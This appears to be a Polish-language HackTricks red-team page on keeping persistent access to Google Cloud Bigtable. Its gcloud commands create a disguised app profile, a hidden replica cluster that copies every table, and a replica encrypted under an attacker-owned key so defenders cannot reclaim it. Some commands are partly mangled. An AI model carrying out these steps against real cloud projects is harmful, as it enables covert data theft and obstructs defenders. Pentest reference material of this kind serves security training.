GCP - Bigtable Utrzymywanie dostępu

Tip

Ucz się & ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się & ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ucz się & ćwicz Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Wspieraj HackTricks

Bigtable

Aby uzyskać więcej informacji o Bigtable, zobacz:

GCP - Bigtable Enum

Dedicated attacker App Profile

Uprawnienia: bigtable.appProfiles.create, bigtable.appProfiles.update.

Utwórz app profile, który kieruje ruch do twojego klastra repliki i włącz Data Boost, aby nie zależeć od przydzielonych węzłów, które obrońcy mogliby zauważyć.

Create stealth app profile ```bash gcloud bigtable app-profiles create stealth-profile \ --instance= --route-any --restrict-to= \ --row-affinity --description="internal batch"

gcloud bigtable app-profiles update stealth-profile
–instance= –data-boost
–data-boost-compute-billing-owner=HOST_PAYS

</details>

Tak długo, jak ten profil istnieje, możesz się ponownie połączyć, używając nowych poświadczeń, które się do niego odnoszą.

### Utrzymaj własny klaster repliki

**Uprawnienia:** `bigtable.clusters.create`, `bigtable.instances.update`, `bigtable.clusters.list`.

Utwórz klaster z minimalną liczbą węzłów w mało aktywnym regionie. Nawet jeśli Twoje tożsamości klienta zostaną usunięte, **klaster zachowa pełną kopię każdej tabeli** dopóki obrońcy jej nie usuną.

<details>

<summary>Utwórz klaster repliki</summary>
```bash
gcloud bigtable clusters create dark-clone \
--instance=<instance-id> --zone=us-west4-b --num-nodes=1

Monitoruj to za pomocą gcloud bigtable clusters describe dark-clone --instance=<instance-id> dzięki czemu możesz natychmiast zwiększyć skalę, gdy będziesz musiał pobrać dane.

Zablokuj replikację za pomocą własnego CMEK

Uprawnienia: bigtable.clusters.create, cloudkms.cryptoKeyVersions.useToEncrypt na kluczu należącym do atakującego.

Użyj własnego klucza KMS przy tworzeniu clone’a. Bez tego klucza Google nie będzie w stanie odtworzyć ani przełączyć klastra, więc blue teams muszą się z tobą skoordynować przed podjęciem działań.

Utwórz klaster chroniony CMEK ```bash gcloud bigtable clusters create cmek-clone \ --instance= --zone=us-east4-b --num-nodes=1 \ --kms-key=projects//locations//keyRings//cryptoKeys/ ```

Obróć lub wyłącz klucz w swoim projekcie, aby natychmiast zbrickować replikę (z możliwością ponownego jej włączenia później).

Tip

Ucz się & ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się & ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ucz się & ćwicz Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Wspieraj HackTricks